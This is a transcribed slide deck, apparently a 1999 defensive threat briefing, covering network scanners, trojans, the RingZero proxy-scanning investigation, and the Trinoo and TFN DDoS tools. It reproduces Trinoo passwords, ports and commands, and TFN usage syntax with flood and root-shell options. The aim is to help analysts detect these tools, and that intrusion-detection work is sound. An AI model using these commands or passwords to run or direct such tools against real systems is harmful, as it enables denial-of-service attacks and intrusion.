1 / 44

Internet Threat Brief

Internet Threat Brief. Bad things that happen to good organizations!. Tools that may be visiting your organization. Jackal Queso Nmap Hping Trojans DDOS. Enter the Jackal 1997.

dunnjamie
Download Presentation

Internet Threat Brief

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Internet Threat Brief Bad things that happen to good organizations!

  2. Tools that may be visiting your organization • Jackal • Queso • Nmap • Hping • Trojans • DDOS

  3. Enter the Jackal 1997 /* Jackal - Stealth/FireWall scanner. With the use of half open ports and sending SYNC (sometimes additional flags like FIN) one can scan behind a firewall. It shouldn’t let the site feel we're scanning by not doing a 3-way-handshake; we hope to avoid any tcp-logging. Credits: Halflife, Jeff (Phiji) Fay, Abdullah Marafie. Alpha Tester: Walter Kopecky. Results: Some firewalls did allow SYN | FIN to pass through. No Site has been able to log the connections though.. during alpha testing.ShadowS shadows@kuwait.net Copyleft (hack it; i really don’t care). */ Opening comments - Jackal.c

  4. Sons of Jackal continue to be seen Source Port 0 and 65535 12:36:54 prober.0 > relay.net.2049: SF 111:111(0) win 512 16:11:38 IMAPER.65535 > ns2.org.143: SF 111:111(0) win 512 13:10:33 newbe.org.0 > 192.168.2.3.13: SF 111:111(0) win 512 SF - SYN = Synchronize or Start; FIN = Finish or Stop

  5. Queso and friendshttp://www.apostols.org/projectz/queso/ Queso sends packets with unexpected code bit combinations to determine the operating system of the remote computer. Currently, they claim to be able to distinguish over 100 OSes and OS states. Queso pattern is shown on notes page

  6. Hping (Jan 98) Designed to port scan hosts indirectly, packets are “bounced off” the host the attacker is framing. Hping is interesting because they are able to both spoof and collect info on the target; this had not been accomplished before.

  7. Nmap The next generation of the tools that came before it integrates all their capabilities in a single tool: • Stealth scanning • Stack analysis, TCP fingerprinting • Sequence number prediction • Decoy

  8. Trojans This is Roland’s home computer, connected to an ISP

  9. Trojans “Driving the Bus”, NETBUS

  10. W97M.Marker.a • Word 97 Virus • HKEY_CURRENT_USER\Software\Microsoft\MS Setup(ACME)\User Info • What does it do? • FTP’s what appear to be “worm tracks”, a list of the previous systems it has infected • Could potentially be a valuable recon tool for developing chains of potential infection

  11. PCs ship with fast modems as standard equipment INTERNET ISP Firewall The more restrictive a site’s firewall policy, the more likely the employees will use modems.

  12. Finding Unprotected SharesLegion 2.1 http://rhino9.ml.org

  13. Trojans Review • The most well known trojan programs are Netbus and Back Orifice • Protective tools include: all major anti-virus tools, nuke nabber, NFR’ Back Officer Friendly, and AtGuard

  14. The Next “Threat Wave” • The security community is doing a better job of securing networks. • Firewalls, IDSs, Encryption • Doesn’t it make sense that future threats will bypass these countermeasures from the inside?

  15. An Example Deep Throat Trace 200.31.13.8 > 158.12.110.1.2140: udp 2 4500 001e e104 0000 7111 8795 ac14 0d08 coa8 6e01 ea60 085c 000a fbb7 3030 8080 0001 0001 0000 0000 0664 6f6e 616c 200.31.13.8 > 158.12.110.2.2140: udp 2 4500 001e e204 0000 7111 8694 ac14 0d08 coa8 6e02 ea60 085c 000a fbb6 3030 0000 0001 0000 0000 0000 0331 3831 0231

  16. The Story of RingZero • Indications and Warnings • This is BIG! • What is it? • What are “they” up to? • Decoding RingZero

  17. Getting A Clue • Sept 19, 1999 Roland Grefer writes with an AtGuard detect from his home.com cablemodem • We both commented that probes to tcp port 3128 are not that common

  18. Indications and Warnings • Sept 21, 1999 - NSWC SHADOW analyst Adena Bushrod reports activity • Army ARL, Mitre, and others are seeing “Proxy Scans” too! Example: 08:58:35 ghostrid3r.1606 > 192.168.2.1.80: S(0) 08:58:36 ghostrid3r.1607 > 192.168.2.1.8080: S(0) 08:58:37 ghostrid3r.1609 > 192.168.2.1.3128: S(0)

  19. SANS Community Validation “ Intrusion detection systems ranging from home computers with cable modems to high end government facilities have been reporting a large number of probes to TCP port 3128, the squid proxy service. If your site has a network monitoring capability and you DO NOT run squid and you detect this pattern over the next two weeks, please let us know by sending email to info@sans.org with intrusion 3128 in the subject line. If you are allowed to send the data trace, please sanitize any of your site's network information (destination host address) and send the data trace as well. Thank you!” This is BIG!

  20. Over 300 3128 MessagesIn Three Days 29;23Sep1999; 7:59:21;xxx.yyy.79.141;log;reject;;E100B1;inbound;tcp;203.98.30.10;xxx.yyy.149.44;3128;64052;48;25; 30;23Sep1999; 7:59:24;xxx.yyy.79.141;log;reject;;E100B1;inbound;tcp;203.98.30.10;xxx.yyy.149.44;3128;64053;48;25; 31;23Sep1999; 8:07:30;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;196.15.173.2;xxx.yyy.214.101;3128;64025;44;48; 32;23Sep1999; 8:24:05;xxx.yyy.79.141;log;reject;;E100B1;inbound;tcp;209.203.121.119;xxx.yyy.124.154;3128;3820;48;25; 33;23Sep1999; 8:24:11;xxx.yyy.111.133;log;reject;;E100B1;inbound;tcp;194.51.132.171;xxx.yyy.170.248;3128;1195;44;25; 34;23Sep1999; 8:59:23;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;156.46.64.149;xxx.yyy.135.194;3128;2570;44;48; 35;23Sep1999; 9:00:49;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;194.51.132.171;xxx.yyy.214.228;3128;2932;44;48; 36;23Sep1999; 9:14:51;xxx.yyy.111.133;log;reject;;E100B1;inbound;tcp;195.44.9.20;xxx.yyy.95.90;3128;1089;44;25; 37;23Sep1999; 9:33:38;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;212.130.192.222;xxx.yyy139.66;3128;2678;48;48; 38;23Sep1999; 9:40:13;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;193.125.239.105;xxx.yyy.1.31;3128;1531;48;48; 39;23Sep1999; 9:56:08;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;194.249.154.21;xxx.yyy.27.35;3128;2515;44;48; 40;23Sep1999; 9:57:40;xxx.yyy.79.141;log;reject;;E100B1;inbound;tcp;200.14.243.166;xxx.yyy.123.25;3128;4879;48;25; Over 1000 Source Hosts!

  21. What Could It Be? • Given: • More than 1000 live sources • Apparently random destinations • What Could It Be? • Spoofed • Worlds largest coordinated attack • Trojan software or “malware

  22. Spoofed Attack? No! “I am almost certain that these are indeed live, non-spoofed hosts. First, I've dumped the tcpdump traffic with the arriving TTL values. I've done about a dozen traceroutes back to the source IP's and the hop counts are believably close. Also, other clues found in the tcpdump output itself appear to point to different hosts or a very wise crafter. “ Judy Novak - ARL

  23. The First Hot Tip - Sept 23 “We began receiving probes to 3128 on Wednesday, September 15th. The probes come in a triplet - first to TCP port 80, then 8080, then 3128. The probes appear to be going after random addresses. One finally hit a web server listening on port 80 so I got to see what it was doing. It sent the following request to the server:” Anonymous get http://www.rusftpsearch.net/cgi-bin/pst.pl/? pst mode = writeip&pst host=192.168.2.1&pstport=80

  24. So What? “Just a couple additional pieces of information. I only probed back in a rather simple way about 5 machines and found none of those running finger, SMTP or FTP, though all were running TCP port 139, so I concluded (with a very small sample size) it was a Windows attack of some kind, though I admit this is a guess based on sketchy information.” Anonymous

  25. Game Over? “I am the Network Security Officer at Vanderbilt University. I have a system that was infected with a trojan called RingZero and was scanning for ports 80, 8080, and 3128. I have pieces of the code specifically a file called its.exe and a file that was Ring0.vxd. I am still trying to find the original infected file and I suspect that it was a screen saver. If you would like more info give me a call.” Ron Marcum, Vanderbilt

  26. Birds Of A Feather • Extreme BoF! • Crowded room • High temperatures • Long hours 7 hours of fun! (7PM-2AM)

  27. Russian Server? Or Not? • The rusftpsearch.net site • contained Russian language text • is a German based company • is hosted by virtualave.net in Seattle, WA • is administered by “Black Harmer” • Black Harmer uses mail.ru for free email • Some of Harmer’s code published on fido7.pvt.virii • The data seems to indicate a “Russian interest”

  28. Latest News • SMTP to Finland • Upon the successful download of two its.dat files, its.exe attempts to connect to tcp port 25 (smtp) of rokol.ramk.fi • Spamming ICQ Users • Spoofs source as www.mircosoft.com • Spams XXXXX@pager.mirabilis.com

  29. Review of Findings • ITS.EXE attempts to • retrieve its.dat from various servers • connect to tcp port 25 of rokol.ramk.fi • Spam random ICQ users with the message “Biggest Proxy List!” and the rusftpsearch URL • PST.EXE is the active scanner • doesn’t require the its.dat file to run • discovered proxies send their IPs to www.rusftpsearch.net

  30. Questions Still Remain • Infection mechanism? • Thought to be an email attachment • What is the its.dat file for? • Targeting • Scan intensity dial • Attack configuration

  31. Implications? “Quantum leap in distributed attack technology” • Viral infection rates • Configurable - its.dat • scanning -> attacking? • Automatic result consolidation • Hacker community notification

  32. Threat Advisory Distributed IW Tools By John Green

  33. Force Multiplication Hacker H1 HN Handler Victims A1 A A A A AN Agent T T Target

  34. Trinoo Network • Distributed UDP Flood DoS Attack Tool • Client / Server Architecture • A trinoo network of 227 systems was used against an Internet2 site, causing a DoS which lasted for two days.

  35. Trinoo Signatures Hacker TCP port 27665 Password “betaalmostdone” H1 UDP port 31335 *HELLO* UDP port 27444 Password “l44adsl” A1 A A AN UDP Random Ports T

  36. Handler die - quit mtimer - dos mdie - mping mdos - info msize - nslookup killdead - usebackup bcast - help mstop Agent aaa start UDP DoS bbb DoS timelimit shi phone home png report in d1e shut down rsz N resize packet xyz Multiple DoS Trinoo Supported Commands

  37. Tribal Flood Network • Distributed ICMP/TCP/UDP Flood DoS • Client / Server Architecture • Similar to Trinoo, but much more stealthy • uses covert channels for handler-agent communications

  38. TFN Signatures Hacker Any backdoor access method H1 ICMP Echo Reply ICMP Echo Reply Commands are sent as 16 bit integers in the ID field of the IP header A1 A A AN TCP/UDP/ICMP Flood T

  39. TFN Supported Commands • Usage: ./tfn <iplist> <type> [ip] [port] • <iplist> - list of agent hosts • <type> - -1 spoofmask, -2 packetsize 0 stop/status 1 udp, 2 syn, 3 icmp 4 bind to a rootshell 5 smurf • [ip] - targetlist separated by @ • [port] - necessary for syn flood, 0 = random

  40. Implications - Upstream DoS

  41. So what does it mean? • 1997 • Stealth, resist logging • Penetration, evade SYN matching • 1998 • TCP Fingerprinting - stack analysis • Coordinated attacks

  42. So what does it mean? • 1999 • Database analysis capability • Continued work on distributed scanners • Decoys, decoys, decoys • Advanced scans for trojans

  43. Houston, we have a problem • Technological surprise • Decoys are going to really screw with low end intrusion detection systems and untrained analysts • CIRTs are going to need raw data from detects

  44. What am I doing • High end proxy firewalls • Checking log files, intrusion detection • Personal firewalls (TCP Wrappers, Nuke Nabber, NFR Officer Friendly, At Guard) • Encrypting more of my files, moving to 2048 bit encryption

More Related